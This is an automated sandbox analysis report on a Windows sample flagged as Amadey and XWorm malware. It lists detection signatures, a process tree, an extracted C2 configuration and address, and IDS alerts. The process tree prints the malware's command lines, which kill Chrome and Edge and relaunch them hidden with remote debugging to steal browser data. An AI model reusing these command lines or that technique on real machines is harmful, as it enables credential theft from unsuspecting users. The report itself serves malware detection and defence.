Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560508
MD5:6aed281d1464e3a53839bbd9e7190535
SHA1:8ea6e9ec2eb3970e0c361538fb6dbd074e5fa6c2
SHA256:a20abe49e71912d860044fdf813c7fb90f32fde51097db4b689cac9c8f7a9ac9
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Telegram RAT
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found pyInstaller with non standard icon
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4508 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6AED281D1464E3A53839BBD9E7190535)
    • skotes.exe (PID: 5476 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 6AED281D1464E3A53839BBD9E7190535)
  • skotes.exe (PID: 6984 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6AED281D1464E3A53839BBD9E7190535)
  • skotes.exe (PID: 4500 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6AED281D1464E3A53839BBD9E7190535)
    • samat.exe (PID: 5228 cmdline: "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" MD5: F74588FC6A3342296CBB881D87C17300)
      • samat.exe (PID: 6120 cmdline: "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" MD5: F74588FC6A3342296CBB881D87C17300)
        • cmd.exe (PID: 1812 cmdline: C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • dxdiag.exe (PID: 6196 cmdline: dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt MD5: 19AB5AD061BF013EBD012D0682DF37E5)
        • taskkill.exe (PID: 6088 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chrome.exe (PID: 2128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 1100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • taskkill.exe (PID: 2172 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msedge.exe (PID: 3360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 1468 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • taskkill.exe (PID: 8020 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msedge.exe (PID: 8084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 3960 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • taskkill.exe (PID: 6220 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msedge.exe (PID: 1252 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 4224 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • taskkill.exe (PID: 7348 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msedge.exe (PID: 5168 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 7356 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • taskkill.exe (PID: 2980 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msedge.exe (PID: 4484 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 7524 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • taskkill.exe (PID: 6548 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msedge.exe (PID: 1224 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 6200 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • taskkill.exe (PID: 5268 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msedge.exe (PID: 8092 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 8148 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • taskkill.exe (PID: 4800 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msedge.exe (PID: 7492 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)
  • mstee.sys (PID: 4 cmdline: MD5: 244C73253E165582DDC43AF4467D23DF)
  • mskssrv.sys (PID: 4 cmdline: MD5: 26854C1F5500455757BC00365CEF9483)
  • svchost.exe (PID: 6628 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 2516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7744 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7760 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • svchost.exe (PID: 3952 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 8064 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 7556 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1796 --field-trial-handle=1976,i,7400251867187163904,16596075297624197194,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x1e48038:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1e480d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1e481ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1e4768a:$cnc4: POST / HTTP/1.1
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000000.00000002.2104456781.00000000006C1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000000.00000003.2063442890.0000000005110000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000002.00000002.2148194212.00000000007A1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 4 entries
              SourceRuleDescriptionAuthorStrings
              2.2.skotes.exe.7a0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                0.2.file.exe.6c0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  3.2.skotes.exe.7a0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe, ParentProcessId: 6120, ParentProcessName: samat.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox, ProcessId: 2128, ProcessName: chrome.exe
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\mstee.sys, NewProcessName: C:\Windows\System32\drivers\mstee.sys, OriginalFileName: C:\Windows\System32\drivers\mstee.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: mstee.sys
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6628, ProcessName: svchost.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-21T22:15:48.704936+010020283713Unknown Traffic192.168.2.55033720.189.173.5443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-21T22:12:37.303034+010020446961A Network Trojan was detected192.168.2.549880185.215.113.4380TCP
                    2024-11-21T22:18:37.261656+010020446961A Network Trojan was detected192.168.2.550148185.215.113.4380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-21T22:12:06.429773+010028561471A Network Trojan was detected192.168.2.549812185.215.113.4380TCP
                    2024-11-21T22:17:33.115436+010028561471A Network Trojan was detected192.168.2.550124185.215.113.4380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-21T22:12:35.903759+010028561221A Network Trojan was detected185.215.113.4380192.168.2.549818TCP
                    2024-11-21T22:18:35.866719+010028561221A Network Trojan was detected185.215.113.4380192.168.2.550146TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-21T22:12:12.018423+010028033053Unknown Traffic192.168.2.549824188.165.52.14443TCP
                    2024-11-21T22:18:33.139564+010028033053Unknown Traffic192.168.2.55014731.41.244.1180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-21T22:18:48.253731+010028536851A Network Trojan was detected192.168.2.550152149.154.167.220443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-21T22:18:57.523762+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:02.521650+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:05.664794+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:07.533863+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:12.557719+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:17.556558+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:18.544558+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:19.107631+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:22.562733+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:28.058952+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:31.595832+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:32.591445+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:37.572545+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:42.573533+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:44.325519+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:47.583027+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:49.281235+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:52.583310+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:57.216603+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:19:57.591256+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:20:02.599360+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:20:07.603262+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:20:10.186673+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:20:11.193125+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550179TCP
                    2024-11-21T22:20:12.593833+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    2024-11-21T22:20:18.111294+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-21T22:19:05.665706+010028529231Malware Command and Control Activity Detected192.168.2.55015587.120.112.338398TCP
                    2024-11-21T22:19:18.545627+010028529231Malware Command and Control Activity Detected192.168.2.55015587.120.112.338398TCP
                    2024-11-21T22:19:31.596692+010028529231Malware Command and Control Activity Detected192.168.2.55015587.120.112.338398TCP
                    2024-11-21T22:19:44.327464+010028529231Malware Command and Control Activity Detected192.168.2.55015587.120.112.338398TCP
                    2024-11-21T22:19:57.223703+010028529231Malware Command and Control Activity Detected192.168.2.55015587.120.112.338398TCP
                    2024-11-21T22:20:10.187579+010028529231Malware Command and Control Activity Detected192.168.2.55015587.120.112.338398TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-21T22:19:19.107631+010028589241Malware Command and Control Activity Detected87.120.112.338398192.168.2.550155TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: file.exeAvira: detected
                    Source: http://185.215.113.43/Zu7JuNko/index.php8Avira URL Cloud: Label: malware
                    Source: http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9Avira URL Cloud: Label: malware
                    Source: http://185.215.113.43/Zu7JuNko/index.php$Avira URL Cloud: Label: malware
                    Source: 00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exeReversingLabs: Detection: 13%
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeReversingLabs: Detection: 13%
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 47%
                    Source: file.exeReversingLabs: Detection: 47%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: file.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB9710 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,_Py_NoneStruct,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,PyEval_SaveThread,CryptUnprotectData,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,PyBytes_FromStringAndSize,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,Py_BuildValue,LocalFree,LocalFree,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,8_2_00007FF8B7EB9710
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB50E0 CryptReleaseContext,8_2_00007FF8B7EB50E0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB48D8 PyArg_ParseTupleAndKeywords,CryptDuplicateKey,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,8_2_00007FF8B7EB48D8
